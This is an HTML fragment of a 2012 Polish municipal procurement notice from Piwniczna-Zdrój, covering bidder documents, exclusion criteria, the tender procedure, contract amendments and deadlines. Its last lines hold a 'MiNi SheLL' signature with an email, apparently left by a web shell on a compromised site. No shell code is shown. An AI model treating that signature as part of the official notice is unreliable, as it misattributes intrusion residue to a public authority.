<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
A.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.
A.3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych
A.4) Wykaz osób do kontaktow z zamawiającym
 A.5)  Wzór umowy 
 A.6) Dokumenty potwierdzające posiadanie uprawnień ( pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
  A.7) Inne dokumenty zgodnie z SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności zgodnie z art.144 Prawo Zamówień Publicznych.
2.W związku z brzmieniem art.144 ustawy, Zamawiający przewiduje następujące możliwości dokonania  zmiany niniejszej umowy:
1)	w zakresie przedmiotu zamówienia,  których nie dało się  przewidzieć w chwili podpisania umowy, a w szczególności:
a)	w sytuacji pojawienia się na rynku nowych rozwiązań technologicznych                                      i materiałowych
b)	zmiana terminów wykonania dostaw, zwłaszcza gdy dotrzymanie terminu wskazanego pierwotnie  okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca
2)	w zakresie zmniejszenie wynagrodzenia ,zwłaszcza w sytuacji zmniejszenia zakresu dostaw,
w zakresie terminów realizacji - jeżeli pojawiły się okoliczności. których nie można było przewidzieć                w chwili zawierania umowy.
3)	w zakresie zmniejszenia lub zwiększenia wynagrodzenia w zawiązku ze zmianą stawki VAT           w zakresie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piwniczna.pl baner BIP link Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gmina Piwniczna-Zdrój
Rynek 20
33-350 Piwniczna-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 10:00, miejsce: Urząd Miasta i Gmina Piwniczna-Zdrój
Rynek 20
33-350 Piwniczna-Zdrój
Pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 27.12.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com